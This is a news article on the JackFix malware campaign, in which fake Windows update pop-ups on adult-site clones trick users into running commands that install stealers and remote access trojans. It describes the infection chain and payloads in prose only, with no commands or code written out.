A new cybersecurity campaign, dubbed JackFix, is tricking users into installing malware via fake Windows update pop-ups on adult websites. Attackers use ClickFix lures to deceive victims into running malicious commands.
This tactic leverages fake adult sites (like xHamster or PornHub clones), often distributed via malvertising. The “urgent security update” creates psychological pressure on victims, leading them to comply with the instructions. Learn more about the campaign here.
ClickFix-style attacks have rapidly increased, tricking users into executing harmful commands under the guise of technical fixes or CAPTCHA verification. Microsoft data shows ClickFix is now the most common initial access method, accounting for 47% of attacks. For more on ClickFix attacks, see here and Microsoft’s report here.
The fake Windows update alert takes over the entire screen, instructing victims to open the Windows Run dialog, paste a command, and hit Enter, initiating the infection. Some sites even contain Russian developer comments.
The attackers heavily obfuscate the ClickFix code and attempt to block users from escaping the full-screen alert. However, due to flawed logic, victims can still use the Escape and F11 keys to close the pop-up.
The initial command executed is an MSHTA payload that’s launched using the legitimate mshta.exe binary, which, in turn, contains JavaScript designed to run a PowerShell command to retrieve another PowerShell script from a remote server. These domains are designed such that directly navigating to these addresses redirects the user to a benign site like Google or Steam.
The downloaded PowerShell script is also heavily obfuscated and includes anti-analysis mechanisms. It attempts to elevate privileges using the Start-Process cmdlet with “-Verb RunAs” and creates Microsoft Defender Antivirus exclusions for command-and-control (C2) addresses and paths where the payloads are staged.
Once successful, the script drops various payloads, including simple remote access trojans (RATs) that are programmed to contact a C2 server, presumably to drop more malware. Acronis described this as “the most egregious example of spray and pray,” with up to eight different payloads observed.
These include Rhadamanthys Stealer, Vidar Stealer 2.0, RedLine Stealer, and Amadey, as well as other unspecified loaders and RATs. If only one of these payloads manages to run successfully, victims risk losing passwords, crypto wallets, and more, with potential for further attack escalation.
The advanced tactics of JackFix, deploying fake pop-ups and obfuscated scripts, reflect a persistent trend in cybercrime. Attackers constantly refine their evasion techniques across diverse platforms.
This ingenuity extends to mobile threats, where malicious Android applications now employ AI-powered obfuscation. These apps mimic legitimate services, stealing data while operating undetected.
Such strategies underscore how threat actors leverage cutting-edge techniques, from social engineering to artificial intelligence. Their aim is to maximize impact and bypass modern security defenses.
The relentless evolution of these attack vectors necessitates constant vigilance. To understand how malware developers use advanced techniques, including AI-driven obfuscation, consider this report on AI-based obfuscated malware.